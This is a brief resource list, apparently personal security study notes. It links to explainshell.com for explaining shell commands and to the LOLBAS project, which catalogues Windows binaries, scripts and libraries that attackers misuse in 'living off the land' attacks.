A very useful website that tells you what the given command does in the detail -> https://explainshell.com/

LOLBins used for "Living off the Land" exploits. The attacker uses what he can.

LOLBAS Living Off The Land Binaries, Scripts and Libraries https://lolbas-project.github.io/#